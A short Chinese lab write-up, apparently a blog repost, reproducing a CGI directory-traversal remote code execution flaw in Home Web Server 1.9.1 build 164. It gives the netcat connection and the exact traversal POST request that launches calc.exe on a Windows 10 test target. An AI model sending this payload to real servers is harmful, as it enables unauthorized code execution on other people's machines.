标签:利用 参考 png cal kali exploit 访问 server 漏洞
一、 Home Web Server 1.9.1 build 164 - CGI Remote Code Execution复现
漏洞描述:
Home Web Server允许调用CGI程序来通过POST请求访问位于/cgi-bin下的文件,然后通过目录遍历,就有可能执行远程主机的任意可执行程序。
漏洞影响范围:
Home Web Server 1.9.1 build 164
漏洞复现:
利用原理:
NC连接发送打开计算器请求,安装Home Web Server 1.9.1 build 164的主机就会自动打开计算器程序。
环境搭建:
攻击机:Kali-Linux-2017.1-vm-amd64 IP:192.168.18.250
靶机:Windows 10 Version 1703(x64) IP:192.168.18.112
Windows10系统中安装并打开Home Web Server 1.9.1 build 164
Kali中使用NC建立连接,命令为:nc 192.168.18.112 80
发送POST请求:POST /cgi-bin/../../../../../../../../Windows/system32/calc.exe HTTP/1.1
当返回400响应时,按Ctrl+C终止请求,此时可以看到windows10自动打开了计算器程序
参考链接:https://www.exploit-db.com/exploits/42128/
Home Web Server 1.9.1 build 164 - CGI Remote Code Execution复现
标签:利用 参考 png cal kali exploit 访问 server 漏洞
原文地址:http://www.cnblogs.com/peterpan0707007/p/7450797.html